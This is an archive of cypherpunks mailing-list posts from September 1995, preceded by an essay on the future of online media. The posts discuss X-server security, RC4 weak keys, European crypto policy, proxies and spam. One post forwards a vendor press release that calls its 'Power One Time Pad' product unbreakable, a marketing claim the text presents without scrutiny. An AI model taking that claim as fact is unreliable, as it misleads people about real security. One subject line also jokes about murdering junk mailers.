now, I don't believe this means the end of various artistic people
and occupations such as producers, directors, etc.  however the artist/writer/
whatever suddenly becomes the driving component, the centerpiece,
of the entire process. he has the ability to very discriminately decide
who he wishes to work "with" (not for!) and who will benefit from his 
own work and in what way. he is no longer a cog in the machine but in
fact the director and driving force of it all. he has the ability to
cut out the parasitical middleman like never before (I do think there
are many truly *beneficial* middlemen out there to help the artist flourish,
and the future will help separate the wheat from the chaff).

there are some things that very big companies give you, and one
of them is a very big budget. but if this is the only purpose of a big
company, than it can almost be seen just as a big investment firm or
capital generating machine. this machine will probably continue to 
exist but will be in an increasingly subservient role to how artists
wish to interact with it, IMHO. this can already be seen in how top
actors and directors are now setting their own terms like never before.

amazingly, as TCM noted in a recent post, industry pundits at one
point were actually saying that "hypertext is dead" a few years ago,
because no new developments had been made in it and the Ted Nelson
Xanadoodoo silliness had never gotten anywhere (despite major bucks
thrown at him-- one almost wonders if he set back hypertext, rather
than advanced it, but that's another story). this is the amazing
lack of vision that most people have about the future, about what 
consumers are really interested in, and you can see it again noted by 
Rickard below. 

at one point huge bucks were being thrown down prototype
projects to deliver news through the vertical-blank interval of the television
screen, and newspapers thought this would be the "information delivery
vehicle of the future". the service flopped. the lesson was not that
"hypertext is dead" or "online services are not profitable" (some of the
actual conclusions of industry analysts) but that this was not the exact
form that the public was interested in.

there is a difference that I have emphasized elsewhere about "interactive"
vs. "interconnective". the former would refer to a human interacting with
computer, like a CD rom game, or hypertext, or whatever. the latter refers
to humans interacting with other humans through cyberspace, more directly,
more viscerally: email, chat forums, communities, multiplayer games, etc.  
the latter is the ingredient that is really driving the hyper cyberspatial 
renaissance, IMHO, and Rickard brings out this point below.  (the neat
thing about home pages is not so much that they are pretty and visually 
appealing, but that they are written by your friend Joe Schmoe next door,
and highly personalized, quirky and eccentric.)

for some of my own investment tips <g>, if you want to 
invest in companies that understand where the future is going, invest in the 
ones that understand: 

1. anyone should be able to publish on the network. no one (not government,
not media company, not internet provider, etc.) is authorized to
control others through allowing or denying access, charging exhorbitant
taxes, charging exhorbitant overhead, etc.  this is not merely a statement
of what is desirable, or my own wishful thinking, it's a basic future reality 
that is already largely formed at this moment. those who don't like it and
fight it will simple fail to be competitive and survive over the long run.

2. the content-providers will not have to pay much for the infrastructure
to provide their wares. in the past distribution and content could not
be separated, and those in control of the former could control the latter.
the two have been *cleaved* in the present and the future. the distribution
costs for "media" are going to become almost completely negligible in
the future. the distribution channels will involve cutthroat competition,
and enormous bandwidth for virtually free. 

2.5 companies that understand this "cleaving" will prosper. companies
that are trying to combine content and delivery don't "get it" and will
probably split or die.

3. humans want to "interconnect" with other humans. pretty pages and
all that other stuff is great, but it doesn't create the insatiable enthusiasm
for being online that "interconnection" does. the future "killer apps"
will be increasingly "interconnective, not interactive".

4. increasingly, quality and true artistry will flourish. you will not be 
able to make a quick buck from crappy material. the public will be able 
to be very selective.  they might be able to buy individual songs from 
songwriters, individual essays from writers, etc. (through clicking on 
various web pages).

5. middlemen will become increasingly accountable for what kind of
value they are adding to the final product. they will not become obsolete,
but will have to justify their cut.  the artist will no longer have to
sell their soul just to get a record or writing in front of the public.
the artist will write their own ticket and set their own standards.
the exploitative aspects of the current media machine (which are quite
reprehensible and widespread, from what I can tell) are going to
be replaced with a "kinder, gentler" approach..

6. the days of a zillion people watching the same program or listening
to the same music are dead.  this is much lamented by the media monsters, 
because this was a big aspect driving their existence. this is not 
so much a "fragmentation of markets" but actually a "blossoming of
individuality". the net will continue to fragment artistic tastes. but
individuals will have little problem fulfilling their own tastes.

7. the paradox of all this is that when people are more free to pursue
that which interests them in particular, and they are not "homogenized
out of existence", the overall organism flourishes. there is nothing
to be lamenting in that a thousand people now do not listen to the same
music or read the same newspaper or whatever-- this is something to 
celebrate. it scares people like politicians, who derive much of their
power from "homogenization".. but thankfully this is another case where I 
think the future will separate the healthy from the lame, presuming
their is indeed a distinction in this case <g>

as you can see, a lot of these points, which may seem pretty obvious to 
a lot of people here, are fundamentally not understood by today's preening
media magnates (which, perhaps, are the entities that *will* become extinct). 
but it's just fine to let them go on their merry way, you know what they say 
about fools and money.

I don't really have any idea, really, where the massive media mergers are
going to go. I certainly am not saying they are going to disappear overnight.
one possibility, as I mentioned, is that they would tend to
become just huge, competing capital providers. they might turn into sort
of "artistic communities", each with a different flavor. if they are going
to die, though, the eclipse will certainly be messy as these big monsters
go down kicking and screaming, realizing that the delicious lunch they
were salivating after was actually sinking in a tar pit.



Boardwatch
Webwatch column
by editor Jack Rickard

The World Wide Web has deservedly captured the imagination of the online
world. It displays both extraordinary connectivity, in that you can
literally hop across continents by clicking the mouse, and a very
visually appealing  graphical interface. And it probably goes
beyond that with the use of audio, videoclips, and more. But it is
destined to die in its current form.

Through the entire history of the online community, there has
been an urge to create pretty screens, have them blessed by lawyers,
and presented online for the consumption of the masses, who in theory
will each pay a little bit of coin of the realm for the privilege.
Literally hundreds of millions of dollars drained into
this rathole fantasy before those who created online
services began observing what people *wanted* to do online. Visually 
appealing screens are alway a novelty. But after the novelty wears
off, the callers move on. Knight-Ridder provided the most grisly 
example of this with their failed VIEWTRON service. But they
weren't alone.

Currently the World Wide Web is in a nearly pure fad phase entirely 
based on novelty. Amost every site you visit has something new and
stunning to offer by way of screen design tricks. But after clicking
through the thousands of sites available for a few weeks, almost
everyone tires of the game and starts looking for a home. Since most
of what the web can do is present information via eye-candy screens, they 
rarely find one. So they are back to newsgroups and e-mail to keep them
occupied.

This is not entirely apparent today. The flood of new callers just gaining 
access is  immense. And according to an NTIA study just released, by the
end of 1995, nearly half of the population online will have just
arrived in 1995. But at some point, webulosis, a hardening of the
web, could set in.

We don't actually think it will happen. There is enough in the combination
of novelty and new blood to keep this in the air for some months.
And that may be all that is needed. But for the web to grow beyond
pretty screens, bulletin boards or something very like bulletin boards 
must migrate to the Web and make it truly useful. In other words, web
sites must evolve into "places" where there are "people" if they
are to continue to be relevent beyond specialty publishing. 

So our theory is that the Web is going to change into a series of bulletin
boards. And bulletin boards, conversely, are going to migrate to the
web with all the caller management, local message conferences, and sense of
"place" that entails.

...

[the article goes on to mention the Whole Earth 'Lectronic Link as a
living embodiment of this trend, see http://www.well.com]

--Vlad Nuri





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jamie Zawinski <jwz@netscape.com>
Date: Fri, 29 Sep 95 16:26:29 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape hole without .Xauthority (fwd)
In-Reply-To: <Pine.3.89.9509291503.A1295-0100000@jamarillo>
Message-ID: <306C804A.3CE1CFB@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Jyri Kaljundi wrote:
> 
> There's a huge hole in the Netscape remote control mechanism for the
> X-Windows based clients.
> Potential impact : anybody can become any user that uses Netscape on any
> system without sufficient X security.

Did you bother to read the spec?  This doesn't matter; if I can
connect to your X server at all, you have already lost.  The spec
(at http://home.netscape.com/newsref/std/x-remote.html) contains:


                              SECURITY CONCERNS
 
Any client which can connect to your X server can control a Netscape
Navigator process running there; authenticating the originator of the
request is beyond the scope of this protocol. It is assumed that the
underlying X security mechanisms will prevent unauthorized people from
accessing your server.
 
It is important (in general) that everyone be aware of the security
risks associated with allowing unlimited access to your X server.
Regardless of whether you use Netscape Navigator, allowing arbitrary
users and hosts access to your X server is a gaping security hole. If
hostile forces an connect to your server, it is trivially easy for them
to execute arbitrary shell commands as you, read and write any of your
files, and watch every character you type.
 
Again, this has nothing to do with Netscape Navigator. It is a property
of the X Window System. If you have turned off security on your X server
with the xhost + command, or if you have announced that a host is
``trusted'' by using xhost or by listing that host in your /etc/X0.hosts
file, then you should be aware of the consequences. If this causes
access to be possible from a host which is not, in fact, trusted, then
you have left your doors wide open.
 
For more information about the security mechanisms one can use with an X
server, consult the manual pages for X(1), Xsecurity(1), xauth(1), and
xhost(1), or talk to your system administrator.

-- 
Jamie Zawinski    jwz@netscape.com   http://www.netscape.com/people/jwz/
``A signature isn't a return address, it is the ASCII equivalent of a
  black velvet clown painting; it's a rectangle of carets surrounding
  a quote from a literary giant of weeniedom like Heinlein or Dr. Who.''
                                                         -- Chris Maeda




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Fri, 29 Sep 95 16:46:37 PDT
To: cypherpunks@toad.com
Subject: Re: Crypto hardware (was: Using sound cards to accelerate RSA?)
Message-ID: <v02120d19ac923f525335@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain



>The reason the market for this is weird is the same reason Sun took
>the DES chips off its motherboards years ago -- you can't conduct
>modern business with the fucked up export regime we are dealing with.
>

Also, even if national boundaries could be transcended (it's not just
the US any more on this score), I'll grant to Tim that server-oriented
cryptography h/w isn't going to be a mass-market item. It's going to
be a niche market, but it's an _absolutely vital_ niche market if this
stuff is going to take off in a big way. I, too, wouldn't invest big
bucks in a company that did nothing but server-oriented crypto h/w,
but I know that a lot of very good business ideas _won't work at all_
if this stuff doesn't exist.

At the same time, there is going to be a very good business in
consumer-oriented crypto devices as the problems inherent in using
a general purpose computer for storing & processing keys, e-cash,
etc. become apparent. I'm leaning away from the less specialized stuff,
e.g. "checkbook on a PCMCIA card" and toward general purpose cards
like the nat. semi. and telequip stuff. Both of these companies are
rumored to be offering server-oriented products in the next couple of
quarters to compliment their consumer product lines.

The problem with general purpose machines has nothing to do with
native processing vs. DSPs, but rather the fact that g.p. machines
have mechanical hard drives and don't fit in your pocket. They also
tend to house a lot of dubious other software that could get its
grubby hands on things. These issues of reliability, portability
and security don't affect things like soundcards, which is why
native signal processing is likely to win there, but not in the
use of crypto to secure valuable transactions.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Syed Yusuf <yusuf921@uidaho.edu>
Date: Fri, 29 Sep 95 16:55:06 PDT
To: cypherpunks@toad.com
Subject: Electronic junk mail
In-Reply-To: <199509292241.RAA24918@dns.eng.auburn.edu>
Message-ID: <Pine.HPP.3.91.950929164534.29284A-100000@harrier.csrv.uidaho.edu>
MIME-Version: 1.0
Content-Type: text/plain




I just recieved an electronic junkmail! 
not only that but it was racist (and/or republican) in content.

<root@goshawk.cserv.uidaho.edu>:
> 
> Syed Yusuf wrote...
>    
>>   how did this get into my mailbox and is there anything I can do to 
>>keep stuff like this out?
>
> apparently someone sent this message to a lot of people -- others have
> reported getting it too.
>
> there is _nothing_ you can do to keep unwanted mail out of your mailbox,
          ^^^^^^^^^!!!!
Nothing? NOTHING??????

Cypher punks to the rescue? my privacy has been violated anyone got any 
ideas besides just putting each individual into my kill file?


--
Syed Yusuf <yusuf921@uidaho.edu> |   http://www.uidaho.edu/~yusuf921 
Keep me away from Wisdom that does not Cry, Philosophy that does not Laugh, 
and Greatness that does not bow before Children
                                                 --Kalil Gibran





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Van Wie <dvw@hamachi.epr.com>
Date: Fri, 29 Sep 95 15:59:38 PDT
To: "'cypherpunks'" <cypherpunks@toad.com>
Subject: Elementrix Press Release
Message-ID: <306C7A37@hamachi>
MIME-Version: 1.0
Content-Type: text/plain



     ELEMENTRIX ANNOUNCES REVOLUTIONARY ENCRYPTION
     FOR INTERNET AND ALL DIGITAL COMMUNICATION ANNOUNCED AT
     NETWORLD + INTEROP

POTP Secure Mail, Secure FTP Avoid Limitations of Existing Systems

    NEW YORK, Sept. 29 /PRNewswire/ -- Elementrix Technologies, Inc. has
announced a security technology for digital communications based on the
only encryption method which is considered unbreakable.  The method,
POTP (Power One Time Pad) eliminates the weaknesses that allow break-ins
to existing systems.
    Two products which feature this technology, POTP Secure Mail and
POTP Secure FTP were voted the leading security products in the Best of
the Show awards announced at the Networld + Interop Show in Atlanta this
week.  The technology is expected to be a boon to both corporate and
individual users of the Internet and a major step forward for electronic
commerce.
    The products are an automatic implementation of One Time Pad (OTP),
the only encryption which is considered unbreakable.  Prior to the
invention of POTP, OTP was used only in extreme situations where cost
and logistical constraints were not determining factors.  Now POTP(TM)
makes this legendary encryption readily available as a commercial
software package.
    As with OTP, POTP creates keys that are as long as the messages they
encrypt, and are used only once.  But unlike OTP, which requires
extensive key distribution and management, POTP(TM) creates real time:
random keys are created automatically during the communication process.
Therefore, users can instantly send private and sensitive e-mail over
the Internet or other open systems with 'point and click security.'
    "Elementrix has found a logical way to generate non-algorithmic,
dynamically changing keys at two separate sites without transmitting
them on the line and without using parallel lines," said Dr. David Kahn,
the country's leading historian of cryptography and the current visiting
historian at the National Security Agency.
    "Elementrix is well within its rights to call this technology Power
One Time Pad.  I see no way of reconstructing the encryption key," he
said at the press conference announcing the products.
    "POTP represents a paradigm shift in encryption," said Winn
Schwartau, an internationally recognized expert on electronic security
who also spoke at the press conference.  "The fundamental technology is
entirely different from any existing encryption scheme.  This is the
first system I've ever seen that can make the entire Internet secure for
non-expert users."
    Schwartau also noted the importance of the system for corporate
users based on its advantages in the area of key management.
    "The problem with systems that depend on passwords for security is
that the infrastructure required to manage and distribute them is
cumbersome, especially in large organizations," he said.  "POTP
eliminates the need for this infrastructure."
     POTP(TM) technology can be used to encrypt any digital
communication.  This can include data communications, secure telephones,
wireless, satellite, cable TV and virtually any method of modern,
digital communications.  All POTP(TM) products are automatic and
transparent to the user.
    The system addresses a paradox in encryption:  "If the keys are
truly unpredictable then there should be no way for one party to
automatically re-create the same keys that are being used by the other,"
said Isaac Rubinstein, executive vice president of Elementrix
Technologies Inc.
    "However, POTP's dynamically changing random keys are created by a
patent pending method during the communication process itself," he said.
"After the POTP(TM) between the two parties has been initialized -- only
the very first time they communicate -- a One Time Pad process is
executed continuously."
    POTP(TM) is patent pending.  This unique method is fully disclosed
on an individual basis only, through a non-disclosure agreement.  A
select group of encryption and security experts, including Kahn and
Schwartau, have been fully briefed and have endorsed the new technology.
    POTP(TM) Secure Mail carries a very low overhead of less than 1.2%.
Encryption and decryption are very fast and have virtually no effect on
software performance.  The system requires an IBM or compatible computer
with a 386 or higher CPU and 4MB of RAM; a modem or network card; and
any TCP/IP stack for Microsoft Windows.  The software is Windows 3.1 and
Windows 95 compatible.

    Professsional Encryption/Personal Privacy
    In the e-mail package, the entire message including attachments is
encrypted in real time as it leaves the PC.  Messages remain totally
private while stored on the mail server, handled by an Internet
provider, and/or sent over communication lines.  Messages are sent in
standard e-mail format with no need for a special mail server.  Any
standard SMTP/POP3 mail server will handle the messages.
    There is no need for any manual key distribution or management:  no
public and private keys; no master and session keys.  Messages remain
private and cannot be read by anyone, even system administrators.
    The manufacturer's suggested list price for the single user is $245.
A special price of $198 will be available during the product
introduction.

    Elementrix Technologies
    Elementrix Technologies Inc., based in New York City, is a
subsidiary of Elementrix Technologies Ltd., based in Haifa, Israel.  The
parent company is a subsidiary of Elron Electronic Industries Ltd.,
Israel's leading advanced technology holding company.  Elementrix was
founded in January 1994 in order to develop commercial applications for
its POTP(TM) encryption and other security products.

CONTACT: Michael Meric, Fusion TMA, 212-977-4600, fax: 212-265-9684, e-mail:
mmeric@elementrix.co.il, or Maia Aron, VP Marketing, Elementrix,
212-888-8879, fax: 212-935-3882, e-mail: maia@elementrix.co.il






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Fri, 29 Sep 95 14:02:13 PDT
To: cypherpunks@toad.com
Subject: (Fwd) Internet  Euro-Clipper
Message-ID: <9509292102.AA10120@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


------- Forwarded Message Follows -------
From Risks Digest, via www-buyinfo

============================================
F Y I

from the RISKS DIGEST-----------

Date: 20 Sep 1995 12:24:10 GMT
From: rja14@cl.cam.ac.uk (Ross Anderson)
Subject: European Governments Agree to Ban Strong Crypto

According to an article in `Communications Week International', the 
34-nation Council of Europe has agreed to outlaw strong encryption 
products which do not make keys available to governments.

The article, `Euro-Clipper chip scheme proposed', is on the
front page of the magazine's issue 151, dated 18th September, which 
arrived in my mail this morning.

It relates that the policy was approved on the 8th September
at Strasbourg by the Council, and coincides with an attempt by the 
European Commission to propose a pan-European encryption standard. 
The Council - unlike the Commission - has no statutory powers to 
enforce its recommendations.

However, Peter Csonka, the chairman of the committee that
drafted the document (and an administrative officer at the 
Council's division of crime problems) says that `it is rare for 
countries to reject  Council of Europe recommendations'.

The proposal would make telecomms operators responsible for
decrypting traffic and supplying it to governments when asked. It 
would also `change national laws to enable judicial authorities to 
chase hackers across borders'.

Opposition to this measure was expressed by Mike Strezbek,
VP responsible for European telecomms at JP Morgan, who said that 
his organisation `will challenge any attempt to limit the power of 
our network encryption technologies very strongly'.

Czonka said that the Council had given consideration to
business interests but had tried to strike a balance between 
privacy and justice. However, `it remains possible that 
cryptography is available to the public which cannot
be deciphered,' his document says. `This might lead to the
conclusion to put restrictions on the possession, distribution, or 
use of cryptography.'

Apparently another international organisation, the OECD, has
called a conference of its members in December to devise a strategy 
on encryption.

I for one will be making clear to my MP that his stand on
this issue will determine how I cast my ballot at the next 
election. I note that John Major stated in a 1994 parliamentary 
written reply to David Shaw MP that the government did not intend 
to legislate on data encryption. 

I am disappointed that government policy has changed to the point 
of supporting the Council of Europe, and that this change has 
sneaked through during the parliamentary recess.

Ross Anderson





Peter Trei
Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
http://www.process.com
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lethin@ai.mit.edu (Rich Lethin)
Date: Fri, 29 Sep 95 14:07:33 PDT
To: cypherpunks@toad.com
Subject: SOFTWARE: Filtering ads out of popular web sites
Message-ID: <199509292107.RAA25904@grape-nuts.ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



On the subject of HTTP proxies, 

[SEVERAL FWD'S DELETED, ENTERTAINING SUBJECTS RETAINED]

- - - Begin forwarded message - - -

Subject: The agents/advertising arms race heats up
Subject: OH YEAH BABY, FILTER ME HARDER

>From: Axel Boldt <boldt@math.ucsb.edu>
>Newsgroups: comp.infosystems.www.announce
>Subject: SOFTWARE: Filtering ads out of popular web sites
>Organization: Univ of California at Santa Barbara, Dept of Mathematics
>Approved: www-announce@boutell.com
>Message-ID: <44ercn$nhl@holly.aa.net>

Several popular web sites have recently turned to putting advertising
gifs on their pages. NoShit is a tool that filters these out so that
you don't see them - in fact, you don't even download them in the
first place, thus saving time, money and brain capacity.

NoShit is implemented as a set of patches against Cern httpd to turn
it into a "filtering proxy server". This means that the proxy
maintains a list of URL templates together with corresponding filter
scripts. When a document is requested form the proxy that matches one
of the templates, then the page is piped through the corresponding
script before being presented to the client. This works together with
caching, if desired.

The idea is to run your own personalized NoShit proxy server and point
your browser to it. The proxy does the filtering; the browser doesn't
even know about it. This scheme works with every browser.

I have written a ready-to-use library of filter scripts for a couple
of well known, ad-infected sites, including Yahoo, Lycos, Netscape,
HotWired, CNN, Infoseek and NandO Times. You can change these or add
your own very easily.

Locations:
            <URL:http://math-www.uni-paderborn.de/~axel/NoShit/>
                (Germany)
    
            <URL:http://emile.math.ucsb.edu:8000/~boldt/NoShit/>
                (California)

Enjoy,
  Axel

- - - End forwarded message - - -






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Doug Hughes <Doug.Hughes@Eng.Auburn.EDU>
Date: Fri, 29 Sep 95 15:42:08 PDT
To: cypherpunks@toad.com
Subject: SKIp
Message-ID: <199509292241.RAA24918@dns.eng.auburn.edu>
MIME-Version: 1.0
Content-Type: text/plain


anybody have any opinions on SKIP (Sun's IP level encryption).
How does it compare for encrypting between machines to something like
ssh? (Obviously ssh is more portable, other than that)
	Doug




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "baldwin" <baldwin@RSA.COM (Robert W. Baldwin)>
Date: Fri, 29 Sep 95 18:19:08 PDT
To: baldwin@RSA.COM (Robert W. Baldwin)
Subject: RSA's comments on RC4 weak keys
Message-ID: <9508298124.AA812423895@snail.rsa.com>
MIME-Version: 1.0
Content-Type: text/plain


        Well, I seem to be falling into the role of spokesperson
for RSA on the net.  It gives me something to do other than
design reviews and programming.  Here is our response to the 
excellent work that Andrew Roos has been doing on RC4.  I am
glad that people are looking at RC4 critically.
                --Bob


-----------------------------
September 29, 1995 statement from RSADSI


RSA Data Security Inc. has been following the emerging
reports of a weakness in certain keys for the RC4 cipher.
RSADSI's researchers have been aware of this particular
property of the RC4 cipher for over a year.   Most ciphers
have a property whereby an enormous amount of known
plaintext will provide a slight reduction in exhaustive key
searching.  The linear cryptanalysis of the DES cipher is an
well known example of this.   Limitations like this in the
underlying ciphers are addressed by following sound advice
on the design of the overall cryptographic system.

Products that include RC4 from RSADSI are not compromised by
this attack.  Companies that license the BSafe cryptography
toolkit have always been given advice that overcomes this
limitation of the RC4 cipher, and this is true even for
products that were built >before< this specific problem was
discovered by the researchers at RSADSI.   These researchers
also monitor all developments in the field of cryptography
and cryptanalysis so they can keep RSADSI's customers
appraised relevant developments.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 29 Sep 95 19:06:45 PDT
To: cypherpunks@toad.com
Subject: Yet Another "(Fwd) Internet  Euro-Clipper"
Message-ID: <ac91f4d10c021004a0e7@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:12 PM 9/29/95, Peter Trei wrote:
>------- Forwarded Message Follows -------

>Date: 20 Sep 1995 12:24:10 GMT
>From: rja14@cl.cam.ac.uk (Ross Anderson)
>Subject: European Governments Agree to Ban Strong Crypto
...

The biggest problem I have with this is that this is the third, fourth, or
fifth posting of Ross Anderson's piece to this list (maybe I'm counting one
or more posts to Cyberia-l). (And others commented on the "Europeans to ban
strong crypto" theme about a week ago.)

I urge people to read what's on the list and not repost things which have
already appeared. If they don't have time to read all of the messages on
the list, which is understandable, then they need to be even more careful
in posting things.

Not to pick on Peter Trei, as this happens all the time, whenever a hot
issue appears.

With 1000 people on the list, repeated postings and cross-posting spams are
getting out of hand.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Fri, 29 Sep 95 16:22:52 PDT
To: Doug Hughes <Doug.Hughes@Eng.Auburn.EDU>
Subject: Re: SKIp
In-Reply-To: <199509292241.RAA24918@dns.eng.auburn.edu>
Message-ID: <199509292322.TAA09464@toxicwaste.media.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


> anybody have any opinions on SKIP (Sun's IP level encryption).
> How does it compare for encrypting between machines to something like
> ssh? (Obviously ssh is more portable, other than that)

SKIP and ssh perform very different operations.  SKIP is an IP-level
encryption engine (ala IP-SEC), whereas ssh is an application-level
encryption engine.  You can run ssh on top of SKIP.  And using SKIP I
can encrypt every single IP packet leaving my machine; you can't do
that with ssh.

Does this help?

-derek





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: buescher@lust.ugcs.caltech.edu (Brent Buescher)
Date: Fri, 29 Sep 95 12:49:05 PDT
To: mlist-cypherpunks@nntp-server.caltech.edu
Subject: Re: "Who shall speak for us?"
In-Reply-To: <ac916a1a0702100409d8@[205.199.118.202]>
Message-ID: <44hiiv$s2h@gap.cco.caltech.edu>
MIME-Version: 1.0
Content-Type: text/plain


Is there a charter for the mailing list?  Some kind of broad position
paper and possibly a history of "exploits" would be helpful for the
typical mediadroid.  Also, maybe the thing to do is to point media
types who want spokespeople in the direction of the EFF.

I have a good friend that's a reporter for a local TV station, and
when you realize how much pressure these guys are under to get a
complete story in a handful of hours and condense it down into one
minute of something that's interesting to Joe Sixpack, it's easy to
understand how the mass media messes up anything vaguely technical or
not easily understood in terms of people's preconceived ideas
(prejudices).

Brent






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Roos <AndrewR@beetle.vironix.co.za>
Date: Fri, 29 Sep 95 12:00:13 PDT
To: stewarts <stewarts@ix.netcom.com>
Subject: RE: Cryptanalysis of RC4 - Preliminary Results (Repeat)
Message-ID: <306C426E@beetle.vironix.co.za>
MIME-Version: 1.0
Content-Type: text/plain



Hi Bill

You could check for the full three-byte prefix, which further reduces the   
number of keys you have to discard. Although all keys beginning "00 00"   
are weak in the sense of my original post, they do not appear to be as   
exploitable as the prefixes which generate two-byte probable sequences.

I also recommend generating and discarding some initial sequence bytes,   
since the generation process mixes up the state table further. An extra   
"round" through the state table (i.e. generating 256 bytes) _appears_ to   
confuse things significantly, since by the time you've generated the   
initial state table from the key, Index Y is a function of all bytes of   
the key, so the second time around it's hard to figure out the impact of   
the byte swaps. But I wouldn't trust this without a significant amount of   
analysis: as always in this field, appearances can be dangerously   
deceptive.

Of course, this defense is not possible with protocols like SSL where you   
have to follow the spec - or better still, PCT which conveniently moves   
the MAC to the *end* of the record, exposing the initial stream...

Andrew

 ----------
From:  stewarts[SMTP:stewarts@ix.netcom.com]
Sent:  29 September 1995 10:16
To:  Andrew Roos
Cc:  cypherpunks
Subject:  Re: Cryptanalysis of RC4 - Preliminary Results (Repeat)

It sounds like any application using RC4 with random session keys
should start by testing session keys and rejecting any that
start with 00 00 or 03 FD; it means doing 2**-15 more random key
generations, and reducing the brute-force space by 2**-15,
but it's a pretty small reduction.
________________________________________________________________
Andrew Roos <andrewr@vironix.co.za>

// C++ programmers have class (but not much inheritance)

PGP Fingerprint: F6 D4 04 6E 4E 16 80 59 3A F2 27 94 8B 9F 40 26
Full key at ftp://ftp.vironix.co.za/PGP-keys/AndrewRoos




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: karlton <karlton@netscape.com>
Date: Fri, 29 Sep 95 21:07:23 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape hole without .Xauthority (fwd)
In-Reply-To: <Pine.3.89.9509291503.A1295-0100000@jamarillo>
Message-ID: <306CC278.4AF@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


If your X server is not secure, then your pass phrases
are not secure. If your pass phrases are not secure then
private keys are compromised. If your private keys are
compromised ...

She swallowed a fly! Perhaps, she'll die.

PK
--
Philip L. Karlton                       karlton@netscape.com
Principal Curmudgeon                    http://www.netscape.com/people/karlton
Netscape Communications Corporation




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: karlton <karlton@netscape.com>
Date: Fri, 29 Sep 95 21:21:33 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape "random" number seed generator code available
In-Reply-To: <9508298123.AA812398949@cc2.dttus.com>
Message-ID: <306CC5CC.6A7E@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


I will mail the relevant files to Mr. Diehl.

PK
--
Philip L. Karlton                       karlton@netscape.com
Principal Curmudgeon                    http://www.netscape.com/people/karlton
Netscape Communications Corporation




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Fri, 29 Sep 95 21:43:26 PDT
To: cypherpunks@toad.com
Subject: Murdering Electronic junk mailers *should* be legal. Nuking thei
Message-ID: <199509300442.VAA28026@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On 29 Sep 95 at 16:54, Syed Yusuf wrote:


> I just recieved an electronic junkmail! 
> not only that but it was racist (and/or republican) in content.
 
!!
> Nothing? NOTHING??????
 
> Cypher punks to the rescue? my privacy has been violated anyone got
> any ideas besides just putting each individual into my kill file?

The return address was forged, I emailed the header chain's 
first smtp server admin to see if they can help. 

If I find the guy, he provider will nuke him or they are toast. 
Period!

> --
> Syed Yusuf <yusuf921@uidaho.edu> |   http://www.uidaho.edu/~yusuf921
> Keep me away from Wisdom that does not Cry, Philosophy that does not
> Laugh, and Greatness that does not bow before Children
>                                                  --Kalil Gibran
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laurent Demailly <dl@hplyot.obspm.fr>
Date: Fri, 29 Sep 95 13:54:37 PDT
To: cypherpunks@toad.com
Subject: Re: Anon Http web Proxy V2.1
In-Reply-To: <9509281922.AA18715@hplyot.obspm.fr>
Message-ID: <9509292054.AA24798@hplyot.obspm.fr>
MIME-Version: 1.0
Content-Type: text/plain


 > I fixed the IOs, it now works a lot faster, play with it on 
 >   http://hplyot.obspm.fr:6661/  (no abuse plz)
 > and get the source package on 
 >   [old now invalid url deleted]

Ok, I updated my tclbin thing to include the unbuffered IO change,
And I've added everything you need to build the shell, as well as the
proxy source itself, in the latest tclbin release :
    ftp://hplyot.obspm.fr/tcl/tclbin-0.5.tgz

I wonder if anyone is interested ?

ps: I received today the rsa/amno shirts I've ordered from Adam, they
*rocks*, well designed, very good quality,... a must ! see
http://www.dcs.ex.ac.uk/~aba/uk-shirt.html
{no i don't earn a buck for advertising :-)}

dl
--
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|...  Freedom
Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept

terrorist strategic South Africa munitions Nazi jihad Marxist




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous@freezone.remailer
Date: Fri, 29 Sep 95 19:12:51 PDT
To: cypherpunks@toad.com
Subject: Re: SAIC bought InterNic, but who is SAIC?  A spook contractor!
Message-ID: <199509300212.WAA29555@light.lightlink.com>
MIME-Version: 1.0
Content-Type: text/plain


URL: http://www.saic.com/corporate/history/25.html


    *** About SAIC ***
     
_________________________________________________________________


   
                          "SAIC 25 YEARS OF PROGRESS"
                                       
   Founded by a small group of San Diego scientists in 1969, 
Science
